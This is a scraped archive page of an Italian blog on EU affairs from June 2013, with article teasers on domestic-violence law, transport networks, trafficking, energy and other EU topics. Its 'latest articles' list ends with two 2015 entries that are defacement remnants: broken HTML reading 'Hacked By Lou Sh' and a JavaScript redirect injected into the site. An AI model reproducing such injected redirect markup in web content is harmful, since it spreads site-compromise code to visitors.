EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Giugno 2013
it

Il Parlamento europeo ha votato per sostenere la proposta della Commissione europea riguardo la legge per l’attuazione di una maggiore tutela per le vittime di violenza, in particolare quella domestica, valida in tutta Europa.

Il Parlamento europeo ha votato per sostenere la proposta della Commissione europea riguardo la legge per l’attuazione di una maggiore tutela per le vittime di violenza, in particolare quella domestica, valida in tutta Europa. La nuova norma, rivolta in particolare alle moltissime donne che (...)

it

Dopo cinque tappe in altrettante città d'Italia, il 7 giugno i dialoghi con i cittadini dei commissari UE approdano a Milano. Ospite d'onore la Commissaria responsabile dell'Azione per il clima, Connie Hedegaard. Al centro dell'incontro con un'ampia rappresentanza di cittadini vi saranno temi quali lo sviluppo sostenibile, la maniera per conservare e valorizzare il clima del pianeta, la lotta e l'adattamento ai cambiamenti climatici (sia tramite le decisioni politiche che attraverso le nostre scelte quotidiane).

Il dibattito, organizzato dalla Commissione europea in occasione dell’Anno europeo dei cittadini, si svolgerà a partire dalle ore 11:00 a Palazzo Marino e vedrà la partecipazione del Sindaco di Milano Giuliano Pisapia. A moderare Federico Taddia – giornalista, scrittore, conduttore e autore (...)

it

La rete centrale di trasporto sarà realizzata entro il 2030 e servirà da struttura portante dei trasporti nel mercato unico. Il prossimo passo per concretizzare la fitta rete di connessione prevede di aggiungere i collegamenti transfrontalieri mancanti, eliminare le strozzature e rendere la rete più intelligente.

Il commissario europeo responsabile per i trasporti, Siim Kallas, oggi ha dato il benvenuto all’accordo tra la Commissione, il Consiglio e il Parlamento, che prevede la trasformazione di strade, autostrade, aeroporti e canali europei, in un’unica rete di trasporti (TEN-T). Kallas ha affermato che (...)

it

Da uno studio dell’Osservatorio e-Commerce B2C Netcomm-School of Management del Politecnico di Milano è emerso che l’Europa ha superato gli USA nel settore dello shopping digitale, attestandosi al primo posto con un fatturato di oltre 300 miliardi di euro. Nonostante permangano differenze tra i vari Stati membri dell’UE per quanto riguarda modalità di pagamento, aspettative in caso di articoli difettosi e diffidenza verso i fornitori digitali, il settore del commercio digitale sembra reagire bene alla crisi.

Il 2012 e l’inizio del 2013 sono stati periodi difficili per i Paesi Europei che hanno dovuto affrontare numerose e crescenti crisi economiche e politiche. Tuttavia se in alcuni settori l’andamento nazionale ha avuto delle ripercussioni inesorabili, in altri ambiti le cose sono andate in (...)

it

Dal 26 maggio al 2 giugno si è tenuta la Settimana europea della Gioventù 2013. Il 30 ed il 31 maggio il presidente del Consiglio europeo Herman Van Rompuy ed il presidente della Commissione José Manuel Barroso, hanno dibattuto a lungo su un argomento caro in questo momento a molti cittadini: le elezioni. Come noto nel 2014 ci saranno le elezioni per il rinnovo del Parlamento europeo, e chi meglio dei giovani potrà dare un contributo significativo per il nostro Continente?

Il dibattito è stato accolto con grande favore e la Commissione è sicura che chi ha partecipato all’evento sia uscito con le idee più chiare su quel che riguarda la futura Europa ed i cittadini che dovranno popolarla. Il nostro Continente è in una situazione abbastanza complicata, sia dal punto di (...)

it

Although BBC News considers all of the original eight candidates for the Iranian presidential election to be homogeneous “hardline conservatives,” as the first round of elections loom, the distinctions between the candidates are becoming stronger and stronger. With the recent televised debate on foreign policy, it is clear that foreign policy is one of the major battlegrounds for the candidates and the differing stances on the issue are an indicator of the major decision the Iranian people will have to make on the 14th.

In a move that seems designed to prevent something similar to the Green Revolution following the controversial 2009 election results, the Iranian Guardian Council has barred any reformist candidates from running in this year’s election. Instead, only eight right-wing based candidates were (...)

it

Sfortunatamente la tratta di esseri umani è oggi più che mai una terribile piaga sociale che necessita di un contrasto unito e deciso da parte delle istituzioni.

Nell’Unione europea, nel periodo 2008-2010, sono state 23.632 le vittime di tale reato, la maggioranza di queste (68%) sono donne. Infatti buona parte delle persone identificate negli anni sopracitati è stata venduta ai fini di sfruttamento sessuale, seguita da quella destinata ai lavori forzati. (...)

it

In futuro recuperare i beni del patrimonio nazionale usciti illecitamente dal proprio territorio sarà più facile. A comunicarlo, lo scorso 30 maggio, il Vicepresidente della Commissione europea, Antonio Tajani. È stato infatti quest’ultimo a proporre di rafforzare la normativa vigente; una decisione maturata dalla consapevolezza che la perdita di beni culturali rappresenta “una grave minaccia alla conservazione delle nostre origini e della storia della nostra civiltà”.

Il traffico illegale di beni culturali costituisce ad oggi un delle pratiche criminali più diffuse a livello internazionale, un’attività che si estende dall’Africa all’Asia, dall’America all’Europa e che comprende dentro di sé un’ampia casistica: dall’uscita di beni senza la dovuta autorizzazione fino (...)

it

Da anni ormai si cerca di andare incontro alle esigenze dei lavoratori, tenendo presente il rispetto dei loro diritti. Per quanto riguarda la sicurezza sul lavoro, l’Europa si trova ad affrontare molto spesso vittime di incidenti sul luogo di lavoro.

Si tratta di uomini, di qualunque età, strappati alle famiglie, alle moglie e ai propri figli. Uomini che vivono la tragedia sul posto di lavoro, dove si trovano per poter dare un futuro migliore a sé stessi e alla loro famiglia; un futuro che non avranno mai. Questo implica più sicurezza e più (...)

it

La EU Sustainable Energy Week è un'iniziativa della Commissione europea che ha visto la luce nel lontano 2006, anno a partire dal quale molti privati ma anche tante organizzazioni si riuniscono per fare il punto della situazione riguardo la sostenibilità dell'energia nel nostro continente. Tante attività sono state svolte per rendere partecipi i cittadini di questo problema che spesso è sottovalutato dai media, ma che alla lunga potrebbe produrre conseguenze non positive sul nostro pianeta. Molte le personalità politiche che hanno partecipato all'evento, a partire da Günther Oettinger, portabandiera dell'iniziativa in qualità di commissario europeo per l'energia.

Le tematiche affrontate sono state molteplici, tutte ovviamente inerenti all’ambito energetico. Martedì 25 giugno il dibattito iniziale si è aperto con uno sguardo d’insieme verso "EU 2020", progetto che prevede una netta crescita in determinati ambiti del Vecchio Continente. Sono state analizzate (...)

it

Sono 8.500 le persone che ogni anno in Europa muoiono per overdose; sono invece 2.100 le morti causate dall'HIV/AIDS contratti a causa dell'utilizzo di droghe, mentre per lo stesso motivo sono 3.000 gli individui che annualmente contraggono il virus dell'HIV.

Tuttavia nel 2012 sono stati rilevati dei dati incoraggianti: un alto numero di persone si è sottoposto a cure di disintossicazione, mentre nel 2011 1,2 milioni di cittadini UE hanno iniziato un programma di riabilitazione, primi fra tutti gli eroinomani, seguiti da consumatori di sostanze (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France